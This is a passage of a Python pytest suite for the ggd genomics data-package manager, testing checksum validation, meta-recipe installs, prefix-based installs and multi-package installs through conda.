    ## Create test recipe (meta.yaml, recipe.sh, post-link.sh, checksums_file.txt)
    recipe = CreateRecipe(
    """
    trial-recipe-v1:
        meta.yaml: |
            build:
              binary_relocation: false
              detect_binary_files_with_prefix: false
              noarch: generic
              number: 0
            extra:
              authors: mjc
              extra-files: []
            package:
              name: trial-recipe-v1
              version: '1'
            requirements:
              build:
              - gsort
              - htslib
              - zlib
              run:
              - gsort
              - htslib
              - zlib
            source:
              path: .
            about:
              identifiers:
                genome-build: hg38
                species: Homo_sapiens
              keywords:
              - gaps
              - region
              summary: hg38 Assembly gaps from USCS
              tags:
                genomic-coordinate-base: 0-based-inclusive
                data-version: 11-Mar-2019
                data-provider: UCSC
                file-type:
                - genome
                final-file-sizes:
                  hg19-chromsizes-ggd-v1.txt: 1.99K
                final-files:
                - trial-recipe-v1.genome
                ggd-channel: genomics

        recipe.sh: |
            #!/bin/sh
            set -eo pipefail -o nounset
            wget https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/genomes/Homo_sapiens/hg19/hg19.genome

        post-link.sh: |
            set -eo pipefail -o nounset
            if [[ -z $(conda info --envs | grep "*" | grep -o "\\/.*") ]]; then
                export CONDA_ROOT=$(conda info --root)
                env_dir=$CONDA_ROOT
                export RECIPE_DIR=$CONDA_ROOT/share/ggd/Homo_sapiens/hg38/trial-recipe-v1/1
            elif [[ $(conda info --envs | grep "*" | grep -o "\\/.*") == "base" ]]; then
                export CONDA_ROOT=$(conda info --root)
                env_dir=$CONDA_ROOT
                export RECIPE_DIR=$CONDA_ROOT/share/ggd/Homo_sapiens/hg38/trial-recipe-v1/1
            else
                env_dir=$(conda info --envs | grep "*" | grep -o "\\/.*")
                export CONDA_ROOT=$env_dir
                export RECIPE_DIR=$env_dir/share/ggd/Homo_sapiens/hg38/trial-recipe-v1/1
            fi
            PKG_DIR=`find "$CONDA_SOURCE_PREFIX/pkgs/" -name "$PKG_NAME-$PKG_VERSION*" | grep -v ".tar.bz2" | grep "$PKG_VERSION.*$PKG_BUILDNUM$"`
            if [ -d $RECIPE_DIR ]; then
                rm -r $RECIPE_DIR
            fi
            mkdir -p $RECIPE_DIR
            (cd $RECIPE_DIR && bash $PKG_DIR/info/recipe/recipe.sh)
            cd $RECIPE_DIR
            ## Iterate over new files and replace file name with data package name and data version
            for f in *; do
                ext="${f#*.}"
                filename="{f%%.*}"
                (mv $f "trial-recipe-v1.$ext")
            done
            ## Add environment variables
            #### File
            if [[ `find $RECIPE_DIR -type f -maxdepth 1 | wc -l | sed 's/ //g'` == 1 ]] ## If only one file
            then
                recipe_env_file_name="ggd_trial-recipe-v1_file"
                recipe_env_file_name="$(echo "$recipe_env_file_name" | sed 's/-/_/g')"
                file_path="$(find $RECIPE_DIR -type f -maxdepth 1)"
            elif [[ `find $RECIPE_DIR -type f -maxdepth 1 | wc -l | sed 's/ //g'` == 2 ]] ## If two files
            then
                indexed_file=`find $RECIPE_DIR -type f \\( -name "*.tbi" -or -name "*.fai" -or -name "*.bai" -or -name "*.crai" -or -name "*.gzi" \\) -maxdepth 1`
                if [[ ! -z "$indexed_file" ]] ## If index file exists
                then
                    recipe_env_file_name="ggd_trial-recipe-v1_file"
                    recipe_env_file_name="$(echo "$recipe_env_file_name" | sed 's/-/_/g')"
                    file_path="$(echo $indexed_file | sed 's/\\.[^.]*$//')" ## remove index extension
                fi
            fi
            #### Dir
            recipe_env_dir_name="ggd_trial-recipe-v1_dir"
            recipe_env_dir_name="$(echo "$recipe_env_dir_name" | sed 's/-/_/g')"
            activate_dir="$env_dir/etc/conda/activate.d"
            deactivate_dir="$env_dir/etc/conda/deactivate.d"
            mkdir -p $activate_dir
            mkdir -p $deactivate_dir
            echo "export $recipe_env_dir_name=$RECIPE_DIR" >> $activate_dir/env_vars.sh
            echo "unset $recipe_env_dir_name">> $deactivate_dir/env_vars.sh
            #### File
            if [[ ! -z "${recipe_env_file_name:-}" ]] ## If the file env variable exists, set the env file var
            then
                echo "export $recipe_env_file_name=$file_path" >> $activate_dir/env_vars.sh
                echo "unset $recipe_env_file_name">> $deactivate_dir/env_vars.sh
            fi
            echo 'Recipe successfully built!'

        checksums_file.txt: |
            trial-recipe-v1.genome\t54416e6d1884e0178e5819fbd4f3a38f
    """, from_string=True)

    recipe.write_recipes()

    from ggd import check_recipe

    ## Check if the recipe is already installed; uninstall it first if so.
    ## (Fixed typo: "trail-recipe-v1" could never match the real package name.)
    if "trial-recipe-v1" in sp.check_output(["conda list {}".format("trial-recipe-v1")], shell=True).decode("utf8"):
        sp.check_output(["conda uninstall trial-recipe-v1 -y"], shell = True)

    ## Create recipe
    recipe_dir_path = recipe.recipe_dirs["trial-recipe-v1"]

    ## build tar.bz2 file and install
    yaml_file = yaml.safe_load(open(os.path.join(recipe_dir_path, "meta.yaml")))
    tarball_file_path = check_recipe._build(recipe_dir_path,yaml_file)
    assert os.path.isfile(tarball_file_path)

    ## Install recipe
    assert check_recipe._install(tarball_file_path, "trial-recipe-v1") == True

    ## Fake ggd_jdict describing the installed package
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'trial-recipe-v1':
                {u'activate.d': False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics',
                u'data-version': u'11-Mar-2019',u'file-type':u'bed',u'final-files':[u'trial-recipe-v1.genome']},
                u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink': False,
                u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package': u'noarch/trial-recipe-v1-1-1.tar.bz2',
                u'pre_link': False, u'keywords': [u'gaps', u'region'], u'summary': u'hg38 Assembly gaps from USCS',
                u'text_prefix': False, u'identifiers': {u'genome-build': u'hg38', u'species': u'Homo_sapiens'}}}}

    ## Test good checksum
    temp_stdout = StringIO()
    with redirect_stdout(temp_stdout):
        install.install_checksum(["trial-recipe-v1"],ggd_jdict)
    output = temp_stdout.getvalue().strip()
    assert ":ggd:install: Checksum for trial-recipe-v1" in output
    assert ":ggd:checksum: installed  file checksum: trial-recipe-v1.genome checksum: 54416e6d1884e0178e5819fbd4f3a38f" in output or ":ggd:checksum: installed file checksum: trial-recipe-v1.genome checksum: 54416e6d1884e0178e5819fbd4f3a38f" in output
    assert ":ggd:checksum: metadata checksum record: trial-recipe-v1.genome checksum: 54416e6d1884e0178e5819fbd4f3a38f" in output
    assert ":ggd:install: ** Successful Checksum **" in output

    ## Create fake recipe payloads: dir1 has a bad checksum record,
    ## dir2 has no checksums_file.txt at all
    fakerecipe = CreateRecipe(
    """
    trial_recipe_dir1:
        info:
            recipe:
                checksums_file.txt: |
                    trial-recipe-v1.genome\taj09f239a;ojveiaj289j

    trial_recipe_dir2:
        info:
            recipe:
                bad_checksums_file.txt: |
                    not a real checksum file
    """, from_string=True)

    fakerecipe.write_nested_recipes()

    trial_recipe1_path = fakerecipe.recipe_dirs["trial_recipe_dir1"]
    trial_recipe2_path = fakerecipe.recipe_dirs["trial_recipe_dir2"]

    ## Replace the cached tarball with one built from the fake payloads
    if os.path.exists(os.path.join(utils.conda_root(),"pkgs","trial-recipe-v1-1-0.tar.bz2")):
        os.remove(os.path.join(utils.conda_root(),"pkgs","trial-recipe-v1-1-0.tar.bz2"))

    import tarfile
    tar = tarfile.open(os.path.join(utils.conda_root(),"pkgs","trial-recipe-v1-1-0.tar.bz2"), "w:bz2")
    tar.add(trial_recipe2_path, arcname=(""))
    tar.close()

    ## Test a tar.bz2 without checksum file: warning, validation skipped
    temp_stdout = StringIO()
    with redirect_stdout(temp_stdout):
        install.install_checksum(["trial-recipe-v1"],ggd_jdict)
    output2 = temp_stdout.getvalue().strip()
    assert ":ggd:install: WARNING: Checksum file not available for the trial-recipe-v1 data package. Data file content validation will be skipped" in output2

    ## Bad checksum record: ChecksumError expected
    tar = tarfile.open(os.path.join(utils.conda_root(),"pkgs","trial-recipe-v1-1-0.tar.bz2"), "w:bz2")
    tar.add(trial_recipe1_path, arcname=(""))
    tar.close()

    try:
        install.install_checksum(["trial-recipe-v1"],ggd_jdict)
        assert False
    except ChecksumError as e:
        assert "Data file content validation failed. The trial-recipe-v1 data package did not install correctly" in str(e)
    except Exception as e:
        print(str(e))
        assert False

    ## Test without installed files: remove the install dir, expect ChecksumError
    species = ggd_jdict["packages"]["trial-recipe-v1"]["identifiers"]["species"]
    build = ggd_jdict["packages"]["trial-recipe-v1"]["identifiers"]["genome-build"]
    version = ggd_jdict["packages"]["trial-recipe-v1"]["version"]
    install_path = os.path.join(utils.conda_root(),"share","ggd",species,build,"trial-recipe-v1",version)
    shutil.rmtree(install_path)

    try:
        install.install_checksum(["trial-recipe-v1"],ggd_jdict)
        assert False
    except ChecksumError as e:
        assert "Data file content validation failed. The trial-recipe-v1 data package did not install correctly" in str(e)
    except Exception as e:
        ## Fixed: the original handler did not bind the exception ("as e"),
        ## so print(str(e)) raised a NameError instead of reporting the error.
        print(str(e))
        assert False

    sp.check_output(["conda","uninstall", "-y", "trial-recipe-v1"])
def test_install_checksum_meta_recipe():
    """
    Test the the checksum is skipped when installing a meta-recipe.

    Builds and installs the gse123-geo-v1 meta recipe (downloaded from the
    ggd-recipes repo and renamed for the GSE123 accession), then checks:
      1) install_checksum() raises AssertionError when called on a meta
         recipe without the parent meta-recipe name.
      2) With the parent name supplied, checksum is initiated but skipped
         with a NOTICE (meta recipes have no fixed checksum records).

    NOTE(review): integration test — requires network access (wget from
    GitHub) and a writable conda environment.
    """
    pytest_enable_socket()

    import tempfile
    from ggd import check_recipe

    ## Stage a local accession-specific copy of the GEO meta recipe
    tmpdir = tempfile.mkdtemp()
    recipe_path = os.path.join(tmpdir, "gse123-geo-v1")
    os.mkdir(recipe_path)

    ## Download files
    try:
        ## checksum file
        sp.check_call(["wget",
                       "https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/checksums_file.txt",
                       "--directory-prefix",
                       recipe_path])

        ## meta.yaml
        sp.check_call(["wget",
                       "https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/meta.yaml",
                       "--directory-prefix",
                       recipe_path])

        ## metarecipe.sh
        sp.check_call(["wget",
                       "https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/metarecipe.sh",
                       "--directory-prefix",
                       recipe_path])

        ## header parser
        sp.check_call(["wget",
                       "https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/parse_geo_header.py",
                       "--directory-prefix",
                       recipe_path])

        ## Post link
        sp.check_call(["wget",
                       "https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/post-link.sh",
                       "--directory-prefix",
                       recipe_path])

        ## recipe.sh
        sp.check_call(["wget",
                       "https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/recipe.sh",
                       "--directory-prefix",
                       recipe_path])

    except sp.CalledProcessError as e:
        print(str(e))
        assert False

    ## Rename the recipe in every downloaded file to the accession-specific name
    for f in os.listdir(recipe_path):
        content = [x.replace("meta-recipe-geo-accession-geo-v1","gse123-geo-v1") for x in open(os.path.join(recipe_path,f))]
        with open(os.path.join(recipe_path,f), "w") as out:
            out.write("".join(content))

    ## Set env vars consumed by the meta-recipe machinery during install
    env_var_tmp_dir, env_var_file_path, final_commands_files = utils.create_tmp_meta_recipe_env_file()

    ## Set environ vars
    os.environ["GGD_METARECIPE_ID"] = "GSE123"
    os.environ["GGD_METARECIPE_ENV_VAR_FILE"] = env_var_file_path
    os.environ["GGD_METARECIPE_FINAL_COMMANDS_FILE"] = final_commands_files

    ## Get yaml file, build, and install the meta recipe
    yaml_file = yaml.safe_load(open(os.path.join(recipe_path, "meta.yaml")))
    tarball_file_path = check_recipe._build(recipe_path,yaml_file)
    assert os.path.isfile(tarball_file_path)

    ## Install recipe
    assert check_recipe._install(tarball_file_path, "gse123-geo-v1") == True

    ## Remove the temp directories
    if os.path.exists(tmpdir):
        shutil.rmtree(tmpdir)
    if os.path.exists(env_var_tmp_dir):
        shutil.rmtree(env_var_tmp_dir)

    ## Recipe info and fake channel metadata for the installed package
    meta_recipe = "gse123-geo-v1"
    parent_meta_recipe = "meta-recipe-geo-accession-geo-v1"

    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'gse123-geo-v1': {u'activate.d':
                False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
                u'', u'data-provider': u'GEO'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
                False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                u'noarch/gse123-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
                u'summary': u'GSE123 GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
                u'meta-recipe', u'species': u'meta-recipe'}}}}

    ## Test without parent_name: install_checksum should refuse via AssertionError
    try:
        install.install_checksum(pkg_names = [meta_recipe],
                                 ggd_jdict = ggd_jdict,
                                 prefix = utils.conda_root(),
                                 meta_recipe = True,
                                 meta_recipe_name = "")
        assert False
    except AssertionError as e:
        assert ":ggd:install: !!ERROR!! Unable to preform checksum on a meta-recipe without the parent meta-recipe name" in str(e)

    ## Test good checksum: initiated, then skipped with a NOTICE for meta recipes
    temp_stdout = StringIO()
    with redirect_stdout(temp_stdout):
        install.install_checksum(pkg_names = [meta_recipe],
                                 ggd_jdict = ggd_jdict,
                                 prefix = utils.conda_root(),
                                 meta_recipe = True,
                                 meta_recipe_name = parent_meta_recipe)
    output = temp_stdout.getvalue().strip()
    assert ":ggd:install: Initiating data file content validation using checksum" in output
    assert ":ggd:install: Checksum for {}".format(meta_recipe) in output
    assert ":ggd:install: NOTICE: Skipping checksum for meta-recipe {} => {}".format(parent_meta_recipe, meta_recipe) in output

    ## Cleanup: uninstall the meta recipe
    sp.check_call(["ggd","uninstall","gse123-geo-v1"])
def test_copy_pkg_files_to_prefix():
    """
    Test that the copy_pkg_files_to_prefix method correctly copies the tarball and pkg files from the current
    conda environment to the target prefix
    """
    pytest_enable_socket()
    env_name = "temp_env6"
    target_prefix = os.path.join(utils.conda_root(), "envs", env_name)

    def wipe_env():
        # Best-effort removal of the temp conda environment and its directory
        sp.check_output(["conda", "env", "remove", "--name", env_name])
        try:
            shutil.rmtree(target_prefix)
        except Exception:
            pass

    ## Start from a clean slate, then create the temp environment
    wipe_env()
    sp.check_output(["conda", "create", "--name", env_name])
    ## Install the recipe into the temp environment from the cached channel
    ggd_recipe = "hg19-pfam-domains-ucsc-v1"
    ggd_channel = "genomics"
    jdict = install.check_ggd_recipe(ggd_recipe, ggd_channel)
    os.environ["CONDA_SOURCE_PREFIX"] = utils.conda_root()
    assert install.install_from_cached([ggd_recipe], ggd_channel, jdict, prefix=target_prefix) == True
    ## Copying into the same prefix as the conda root must be rejected
    assert install.copy_pkg_files_to_prefix(utils.conda_root(), [ggd_recipe]) == False
    ## Derive the expected tarball / package-dir names from the installed package metadata
    pkg_info = get_conda_package_list(target_prefix)[ggd_recipe]
    pkg_version = str(pkg_info["version"])
    pkg_build = str(pkg_info["build"])
    tarfile = "{}-{}-{}.tar.bz2".format(ggd_recipe, pkg_version, pkg_build)
    pkgdir = "{}-{}-{}".format(ggd_recipe, pkg_version, pkg_build)
    tar_path = os.path.join(target_prefix, "pkgs", tarfile)
    dir_path = os.path.join(target_prefix, "pkgs", pkgdir)
    ## The install should have put both artifacts into the target prefix
    assert os.path.isfile(tar_path) == True
    assert os.path.isdir(dir_path) == True
    ## Delete them so the copy routine itself can be exercised
    os.remove(tar_path)
    shutil.rmtree(dir_path)
    assert os.path.isfile(tar_path) == False
    assert os.path.isdir(dir_path) == False
    ## The copy should succeed and the artifacts should exist in both prefixes
    assert install.copy_pkg_files_to_prefix(target_prefix, [ggd_recipe]) == True
    assert os.path.isfile(os.path.join(utils.conda_root(), "pkgs", tarfile))
    assert os.path.isdir(os.path.join(utils.conda_root(), "pkgs", pkgdir))
    assert os.path.isfile(tar_path)
    assert os.path.isdir(dir_path)
    ## Clean up the temp environment
    wipe_env()
    assert os.path.exists(target_prefix) == False
def test_non_prefix_capable_package():
    """
    Test that a package which cannot be installed with --prefix is properly handled
    """
    pytest_enable_socket()
    env_name = "non_prefix_capable"
    env_prefix = os.path.join(utils.conda_root(), "envs", env_name)
    ## Make sure no stale environment is lying around, then create a fresh one
    sp.check_output(["conda", "env", "remove", "--name", env_name])
    try:
        shutil.rmtree(env_prefix)
    except Exception:
        pass
    sp.check_output(["conda", "create", "--name", env_name])
    ## Installing a non prefix-capable package with the --prefix flag must raise an AssertionError
    args = Namespace(channel='genomics', command='install', debug=False, name=["danrer10-gtf-ensembl-v1"], file=[] ,prefix=env_prefix, id = None)
    with pytest.raises(AssertionError) as pytest_wrapped_e:
        install.install((), args)
    assert pytest_wrapped_e.match(":ggd:install: !!ERROR!! the --prefix flag was set but the 'danrer10-gtf-ensembl-v1' data package is not set up to be installed into a different prefix. GGD is unable to fulfill the install request. Remove the --prefix flag to install this data package. Notify the ggd team if you would like this recipe to be updated for --prefix install compatibility")
    ## Clean up the temp environment
    sp.check_output(["conda", "env", "remove", "--name", env_name])
    try:
        shutil.rmtree(env_prefix)
    except Exception:
        pass
    assert os.path.exists(env_prefix) == False
def test_install_main_function():
    """
    Test the main install function (install.install) end to end: argument
    validation, a fresh install, a repeat install of an already-installed
    package, and the failure path when the installed data path is broken.
    """
    pytest_enable_socket()
    remove_pfam()
    CONDA_ROOT = utils.conda_root()
    ## Test empty name and file parameters: with neither a package name nor --file, install must sys.exit
    args = Namespace(channel='genomics', command='install', debug=False, name=[], file=[] ,prefix=None, id = None)
    with pytest.raises(SystemExit) as pytest_wrapped_e:
        install.install((), args)
    assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
    assert pytest_wrapped_e.match(":ggd:install: !!ERROR!! Either a data package name or a file name with --file is required. Neither option was provided.") ## Check the exit error message
    ## Test bad --file parameters: a nonexistent file is reported through an AssertionError
    args = Namespace(channel='genomics', command='install', debug=False, name=[], file=["FaKe_FilE.Txt"] ,prefix=None, id = None)
    try:
        install.install((), args)
        assert False
    except AssertionError as e:
        assert ":ggd:install: !!ERROR!! The FaKe_FilE.Txt file provided does not exists" in str(e)
    except Exception as e:
        ## Any other exception type is a test failure
        print(str(e))
        assert False
    ## Test a non ggd recipe: an unknown package name must sys.exit
    ggd_recipe1 = "Fake-hg19-gaps"
    args = Namespace(channel='genomics', command='install', debug=False, name=[ggd_recipe1], file=[] ,prefix=None, id = None)
    with pytest.raises(SystemExit) as pytest_wrapped_e:
        install.install((), args)
    assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
    ## Install pfam and verify the expected progress messages on stdout
    ggd_recipe = "hg19-pfam-domains-ucsc-v1"
    args = Namespace(channel='genomics', command='install', debug=False, name=[ggd_recipe], file=[], prefix=None, id = None)
    temp_stdout = StringIO()
    with redirect_stdout(temp_stdout):
        install.install((), args)
    output = temp_stdout.getvalue().strip()
    assert ":ggd:install: hg19-pfam-domains-ucsc-v1 version 1 is not installed on your system" in output
    assert ":ggd:install: hg19-pfam-domains-ucsc-v1 has not been installed by conda" in output
    assert ":ggd:install: The hg19-pfam-domains-ucsc-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
    assert ":ggd:install: Attempting to install the following cached package(s):\n\thg19-pfam-domains-ucsc-v1" in output
    assert ":ggd:utils:bypass: Installing hg19-pfam-domains-ucsc-v1 from the ggd-genomics conda channel" in output
    assert ":ggd:install: Updating installed package list" in output
    assert ":ggd:install: Install Complete" in output
    assert ":ggd:install: Installed file locations" in output
    assert ":ggd:install: Environment Variables" in output
    ## Test an already installed ggd recipe: a second install reports the existing location instead of reinstalling
    args = Namespace(channel='genomics', command='install', debug=False, name=[ggd_recipe], file=[], prefix=None, id = None)
    temp_stdout = StringIO()
    with redirect_stdout(temp_stdout):
        install.install((), args)
    output = temp_stdout.getvalue().strip()
    assert ":ggd:install: 'hg19-pfam-domains-ucsc-v1' is already installed." in output
    assert "You can find hg19-pfam-domains-ucsc-v1 here:" in output
    assert ":ggd:install: hg19-pfam-domains-ucsc-v1 version 1 is not installed on your system" not in output
    ## Test a previously installed recipe, but the recipe path is broken
    ggd_recipe = "hg19-pfam-domains-ucsc-v1"
    args = Namespace(channel='genomics', command='install', debug=False, name=[ggd_recipe], file=[], prefix=None, id = None)
    jdict = install.check_ggd_recipe(ggd_recipe,"genomics")
    species = jdict["packages"][ggd_recipe]["identifiers"]["species"]
    build = jdict["packages"][ggd_recipe]["identifiers"]["genome-build"]
    version = jdict["packages"][ggd_recipe]["version"]
    path = os.path.join(CONDA_ROOT,"share","ggd",species,build,ggd_recipe,version)
    ## Break the install by deleting the installed data files and their directory
    for f in os.listdir(path):
        os.remove(os.path.join(path,f))
    os.rmdir(path)
    ## Installing on top of the broken path must sys.exit
    with pytest.raises(SystemExit) as pytest_wrapped_e:
        install.install((), args)
    assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
    remove_pfam()
def test_install_main_function_multiple_recipes():
    """
    Test the main install function with multiple recipe requests, provided both
    as positional package names and through an install file with --file.
    """
    pytest_enable_socket()
    remove_pfam()
    CONDA_ROOT = utils.conda_root()
    ## Test install with multiple packages given as positional names
    recipes = ["grch37-chromsizes-ggd-v1","hg19-chromsizes-ggd-v1"]
    args = Namespace(channel='genomics', command='install', debug=False, name=recipes, file=[], prefix=None, id = None)
    temp_stdout = StringIO()
    with redirect_stdout(temp_stdout):
        install.install((), args)
    output = temp_stdout.getvalue().strip()
    assert ":ggd:install: grch37-chromsizes-ggd-v1 version 1 is not installed on your system" in output
    assert ":ggd:install: grch37-chromsizes-ggd-v1 has not been installed by conda" in output
    assert ":ggd:install: The grch37-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
    assert ":ggd:install: hg19-chromsizes-ggd-v1 version 1 is not installed on your system" in output
    assert ":ggd:install: hg19-chromsizes-ggd-v1 has not been installed by conda" in output
    assert ":ggd:install: The hg19-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
    assert ":ggd:install: Attempting to install the following cached package(s):\n\tgrch37-chromsizes-ggd-v1\n\thg19-chromsizes-ggd-v1" in output
    assert ":ggd:utils:bypass: Installing grch37-chromsizes-ggd-v1, hg19-chromsizes-ggd-v1 from the ggd-genomics conda channel" in output
    assert ":ggd:install: Updating installed package list" in output
    assert ":ggd:install: Install Complete" in output
    assert ":ggd:install: Installed file locations" in output
    assert ":ggd:install: Environment Variables" in output
    ## Verify each recipe's data file landed in the current conda root
    for name in recipes:
        jdict = install.check_ggd_recipe(name,"genomics")
        species = jdict["packages"][name]["identifiers"]["species"]
        build = jdict["packages"][name]["identifiers"]["genome-build"]
        version = jdict["packages"][name]["version"]
        file1 = "{}.txt".format(name)
        assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version))
        assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file1))
    ## Best-effort uninstall. Catch SystemExit explicitly (uninstall may call
    ## sys.exit) rather than using a bare except, so KeyboardInterrupt can
    ## still abort the test run.
    for name in recipes:
        try:
            args = Namespace(channel='genomics', command='uninstall', names=[name])
            uninstall.uninstall((),args)
        except (SystemExit, Exception):
            pass
    ## Test install with multiple packages with --file
    recipes = ["grch38-chromsizes-ggd-v1","hg38-chromsizes-ggd-v1"]
    args = Namespace(channel='genomics', command='install', debug=False, name=[], file=recipes, prefix=None, id = None)
    ## Catch bad file: the recipe names passed as --file values are not existing files
    try:
        install.install((),args)
        assert False
    except AssertionError as e:
        assert ":ggd:install: !!ERROR!! The grch38-chromsizes-ggd-v1 file provided does not exists" in str(e)
    except Exception:
        assert False
    ### Create a real install file listing both recipes
    install_file = CreateRecipe(
    """
    install_path:
        install.txt: |
            grch38-chromsizes-ggd-v1
            hg38-chromsizes-ggd-v1
    """, from_string=True)
    install_file.write_recipes()
    install_file_dir_path = install_file.recipe_dirs["install_path"]
    install_file_path = os.path.join(install_file_dir_path,"install.txt")
    args = Namespace(channel='genomics', command='install', debug=False, name=[], file=[install_file_path], prefix=None, id = None)
    ## Try good file
    temp_stdout = StringIO()
    with redirect_stdout(temp_stdout):
        install.install((), args)
    output = temp_stdout.getvalue().strip()
    assert ":ggd:install: grch38-chromsizes-ggd-v1 version 1 is not installed on your system" in output
    assert ":ggd:install: grch38-chromsizes-ggd-v1 has not been installed by conda" in output
    assert ":ggd:install: The grch38-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
    assert ":ggd:install: hg38-chromsizes-ggd-v1 version 1 is not installed on your system" in output
    assert ":ggd:install: hg38-chromsizes-ggd-v1 has not been installed by conda" in output
    assert ":ggd:install: The hg38-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
    assert ":ggd:install: Attempting to install the following cached package(s):\n\tgrch38-chromsizes-ggd-v1\n\thg38-chromsizes-ggd-v1" in output
    assert ":ggd:utils:bypass: Installing grch38-chromsizes-ggd-v1, hg38-chromsizes-ggd-v1 from the ggd-genomics conda channel" in output
    assert ":ggd:install: Updating installed package list" in output
    assert ":ggd:install: Install Complete" in output
    assert ":ggd:install: Installed file locations" in output
    assert ":ggd:install: Environment Variables" in output
    ## Verify each recipe's data file landed in the current conda root
    for name in recipes:
        jdict = install.check_ggd_recipe(name,"genomics")
        species = jdict["packages"][name]["identifiers"]["species"]
        build = jdict["packages"][name]["identifiers"]["genome-build"]
        version = jdict["packages"][name]["version"]
        file1 = "{}.txt".format(name)
        assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version))
        assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file1))
    ## Best-effort uninstall; same exception handling rationale as above
    for name in recipes:
        try:
            args = Namespace(channel='genomics', command='uninstall', names=[name])
            uninstall.uninstall((),args)
        except (SystemExit, Exception):
            pass
    ## NOTE: additional tests covering multiple --file arguments and mixed
    ## positional/--file installs were removed to reduce test time; see
    ## version control history to restore them.
def test_install_main_function_with_prefix_set():
    """
    Test the main install function with the --prefix flag set, using both a full
    environment path and an environment short name as the prefix value.
    """
    pytest_enable_socket()
    ggd_recipe = "hg19-pfam-domains-ucsc-v1"
    ggd_channel = "genomics"

    def _remove_env(env_name, env_prefix):
        ## Best-effort removal of a temp conda environment and its directory
        sp.check_output(["conda", "env", "remove", "--name", env_name])
        try:
            shutil.rmtree(env_prefix)
        except Exception:
            pass

    def _install_and_verify(env_name, env_prefix, prefix_arg):
        ## Create a fresh env, install the recipe into it via --prefix, and verify
        ## the data files and conda package artifacts land in the target prefix
        ## and NOT in the current conda root.
        sp.check_output(["conda", "create", "--name", env_name])
        jdict = install.check_ggd_recipe(ggd_recipe, ggd_channel)
        species = jdict["packages"][ggd_recipe]["identifiers"]["species"]
        build = jdict["packages"][ggd_recipe]["identifiers"]["genome-build"]
        version = jdict["packages"][ggd_recipe]["version"]
        args = Namespace(channel='genomics', command='install', debug=False, name=[ggd_recipe], file=[], prefix=prefix_arg, id = None)
        assert install.install((), args) == True
        ### Test the file exists in the correct prefix and not the current prefix
        file1 = "{}.bed12.bed.gz".format(ggd_recipe)
        file2 = "{}.bed12.bed.gz.tbi".format(ggd_recipe)
        assert os.path.exists(os.path.join(env_prefix,"share","ggd",species,build,ggd_recipe,version))
        assert os.path.isfile(os.path.join(env_prefix,"share","ggd",species,build,ggd_recipe,version,file1))
        assert os.path.isfile(os.path.join(env_prefix,"share","ggd",species,build,ggd_recipe,version,file2))
        assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_recipe,version,file1)) == False
        assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_recipe,version,file2)) == False
        assert "CONDA_SOURCE_PREFIX" in os.environ
        ## Test that the tarfile and the pkg dir were correctly copied to the prefix
        data_packages = get_conda_package_list(env_prefix)
        pkg_version = str(data_packages[ggd_recipe]["version"])
        build_number = str(data_packages[ggd_recipe]["build"])
        tarfile = "{}-{}-{}.tar.bz2".format(ggd_recipe,pkg_version,build_number)
        pkgdir = "{}-{}-{}".format(ggd_recipe,pkg_version,build_number)
        assert os.path.isfile(os.path.join(env_prefix,"pkgs",tarfile))
        assert os.path.isdir(os.path.join(env_prefix,"pkgs",pkgdir))

    ## ---- Prefix given as a full environment path ----
    temp_env = os.path.join(utils.conda_root(), "envs", "temp_env7")
    _remove_env("temp_env7", temp_env)
    ## Installing into an environment that does not exist must raise
    ## CondaEnvironmentNotFound (any other exception fails the test)
    args = Namespace(channel='genomics', command='install', debug=False, name=[ggd_recipe], file=[], prefix=temp_env, id = None)
    with pytest.raises(CondaEnvironmentNotFound):
        install.install((), args)
    ## Test a good install into a designated prefix
    _install_and_verify("temp_env7", temp_env, temp_env)
    _remove_env("temp_env7", temp_env)
    assert os.path.exists(temp_env) == False

    ## ---- Prefix given as an environment short name ----
    env_name = "temp_env_with_name"
    temp_env = os.path.join(utils.conda_root(), "envs", env_name)
